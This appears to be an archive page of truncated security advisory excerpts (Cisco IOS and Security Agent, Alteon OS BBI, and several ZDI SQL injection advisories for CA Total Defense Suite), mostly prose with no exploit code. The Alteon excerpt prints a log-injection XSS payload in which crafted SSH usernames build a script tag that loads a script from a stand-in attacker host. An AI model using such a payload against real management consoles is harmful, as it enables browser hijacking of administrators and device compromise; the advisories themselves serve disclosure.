The Management

Cisco Security Advisory: Cisco IOS Software Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability

A vulnerability exists in the Cisco IOS software implementation of
Layer 2 Tunneling Protocol (L2TP), which affects limited Cisco IOS
software releases.

Several features enable the L2TP mgmt daemon process within Cisco IOS
software, including but not limited to Layer 2 virtual private
networks (L2VPN), Layer 2 Tunnel Protocol Version 3 (L2TPv3), Stack
Group Bidding Protocol (SGBP) and Cisco Virtual Private Dial-Up
Networks (VPDN). Once this process is enabled the device is
vulnerable.

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Agent

+---------------------------------------------------------------------

Summary
=======

The Management Center for Cisco Security Agents is affected by a
directory traversal vulnerability and a SQL injection vulnerability.
Successful exploitation of the directory traversal vulnerability may
allow an authenticated attacker to view and download arbitrary files
from the server hosting the Management Center. Successful
exploitation of the SQL injection vulnerability may allow an

[DSECRG-09-062] Alteon OS BBI (Nortell) - Multiple Vulnerabilities

        When an administrator views the log via the BBI, the browser receives the following:

...
Jul  3 13:12:44 <NortelSwitch> NOTICE  mgmt: Failed login attempt via SSH from host
<AttackerHost>, user <script a="<BR>Jul  3 13:13:08 <NortelSwitch> NOTICE  mgmt:
Failed login attempt via SSH from host <AttackerHost>, user "
src="http://<EvilHost>/inj.js" b="<BR>Jul  3 13:13:23 <NortelSwitch> NOTICE  mgmt:
Failed login attempt via SSH from host <AttackerHost>, user "></script><BR>


Cisco Security Advisory: Management Center for Cisco Security Agent Remote Code Execution Vulnerability

+---------------------------------------------------------------------

Summary
=======

The Management Center for Cisco Security Agent is affected by a
vulnerability that may allow an unauthenticated attacker to perform
remote code execution on the affected device.

Cisco has released free software updates that address this
vulnerability.

ZDI-12-022 : Total Defense Suite UNC Management Console ExportReport SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the ExportReport stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the ExportReport stored
procedure, it is possible for a remote, unauthenticated user to inject
arbitrary SQL commands in the SOAP request--which could ultimately lead
to arbitrary code execution under the context of the SYSTEM user by

ZDI-11-133: CA Total Defense Suite UNC Management Console DeleteReports SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the DeleteReports stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the DeleteReports stored
procedure, it is possible for a remote, unauthenticated user to inject
arbitrary SQL commands in the SOAP request which could ultimately lead
to arbitrary code execution under the context of the SYSTEM user by

ZDI-11-129: CA Total Defense Suite UnassignAdminRoles Stored Procedure SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the UnassignAdminRoles stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the
UnAssignFunctionalUsers stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under

ZDI-11-132: CA Total Defense Suite UNC Management Console DeleteReportLayout SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the DeleteReportLayout stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the DeleteReportLayout
stored procedure, it is possible for a remote, un-authenticated user to
inject arbitrary SQL commands in the SOAP request which could ultimately
lead to arbitrary code execution under the context of the SYSTEM user by

ZDI-11-131: CA Total Defense Suite NonAssignedUserList Stored Procedure SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the NonAssignedUserList stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
NonAssignedUserList stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under

ZDI-11-128: CA Total Defense Suite UnassignFunctionalUsers Stored Procedure SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability. 

The specific flaw exists within the UnAssignFunctionalRoles stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
UnAssignFunctionalUsers stored procedure, it is possible for a remote,
un-authenticated user to inject arbitrary SQL commands in the SOAP
request which could ultimately lead to arbitrary code execution under

ZDI-11-134: CA Total Defense Suite UNC Management Console RegenerateReport SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite r12. Authentication
is not required to exploit this vulnerability.

The specific flaw exists within the RegenerateReport stored procedure,
accessed via the management.asmx console. The Management Web Service
listens for SOAP 1.2 requests on port 34444 for HTTP and 34443 for
HTTPS. Due to a flaw in the implementation of the RegenerateReport
stored procedure, it is possible for a remote, unauthenticated user to
inject arbitrary SQL commands in the SOAP request which could ultimately
lead to arbitrary code execution under the context of the SYSTEM user by

ZDI-12-024 : Total Defense Suite UNC Management Web Service uncsp_ViewReportsHomepage SQL Injection Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA Total Defense Suite. Authentication is
not required to exploit this vulnerability.

The specific flaw exists within the uncsp_ViewReportsHomepage stored
procedure, accessed via the management.asmx console. The Management Web
Service listens for SOAP 1.2 requests on port 34444 for HTTP and 34443
for HTTPS. Due to a flaw in the implementation of the
uncsp_ViewReportsHomepage stored procedure, it is possible for a remote,
unauthenticated user to inject arbitrary SQL commands in the SOAP
request--which could ultimately lead to arbitrary code execution under



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.